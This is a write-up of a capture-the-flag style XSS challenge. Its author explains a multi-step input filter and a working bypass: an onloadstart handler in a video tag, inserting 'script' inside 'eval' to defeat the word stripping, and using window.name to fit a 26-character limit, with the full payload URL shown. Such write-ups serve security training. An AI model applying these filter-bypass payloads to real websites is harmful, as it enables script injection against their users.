Back in June 10, 2016, I published an XSS challenge on hack.me platform I called Small Youtube XSS . If you are here just for solution and not interested in write-up, here’s a link Here.

Keep reading if you are the rules and hints.

Description

In this XSS challenge, you need to use many tricks to create a working vector, It is not that hard, but not so easy as well.

Rules

  • No user interaction allowed. 
  • Use only modern browsers (IE11, FF49 … etc.) 
  • We need to see alert box with domain name. 

Hints

  • Use (?xss=) as inject.
  • Try to find missing or weak “things” in HTTP header and HTML source. 
  • Have you ever been told that you are too short for join to basketball team? Now you are too long to XSS this.
  • Watch the video for motivation “https://www.youtube.com/watch?v=hzBCI13rJmA” . 
    If you solve it, please contact me (a.hussam[at]isecur1ty.org), and enjoy!

The challenge has been running for months now, and there are only 2 solvers yet, it has been started over a 1100 times. So here is the solution. 

Solution

I deleted the source code a long time ago, so I’ll try to guess or remember what I wrote before. I made this challenge based on the multi-steps filters that do filtering in serial steps. 

  • First, it replaces words like eval, setIntraval, and setTimeout with (xss-event).
  • Second, it remove script word (key of solution).
  • Third, it will replace event handler attributes with (xss-event) . (except 2 of them) 
  • Htmlentities is enabled on the xss parameter so less, greater than, and double quotation are useless.  
<video width="450" height="400" controls name=injection_here>
    <source src="http://www.google.com/test.mp4" type="video/mp4">
  Your browser does not support the video tag.
</video>

Our injection point is at the video tags, here’s the even handler for video tags HTML5 Video Events and API.
You will find them all has been filtered except for two of them aren’t!  onloadstart , onratechange , and   onratechange requires user interaction so we excluded it.

xss
xss

xss

The domain is filtered, so we will have to use the script remove trick. 

xss
Another problem here, the payload should be only 26 characters.

<?php
  $_GET['xss'] = substr( $_GET['xss'], 0, 26) ;
?>

Plot twist

https://en.wikipedia.org/wiki/Plot_twist

We should use another method to alert document.domain since the regular payload is too long. We should use eval(). eval will make our string work as JS code but where we could put a string, we can make it using window.name.

eval is filtered but we need to use the script trick again, so it will be evscriptal(name). The all in one will be:

<a href="http://s25504-102604-rmx.tarentum.hack.me/myvideo.php?xss=''onloadstart=evscriptal(name)" target="javascript:alert(domain);">click me</a>

And here we are:

xss

there are multiple ways to give a name to a window like window.open or name in iframe tag which I allowed to be framed, but I made a frame busting in the page that can be bypassed easily. 

Solvers

  • Adam Simuntis (adam.simuntis[at]secforce.com) with nice and expected solution. 
  • Lucas Philippe (Bug in my code which is fixed).

I hope you enjoyed the write-up and the challenge, see you soon with another one.

For questions or inquiries, contact me on my twitter account @Abdulahhusam.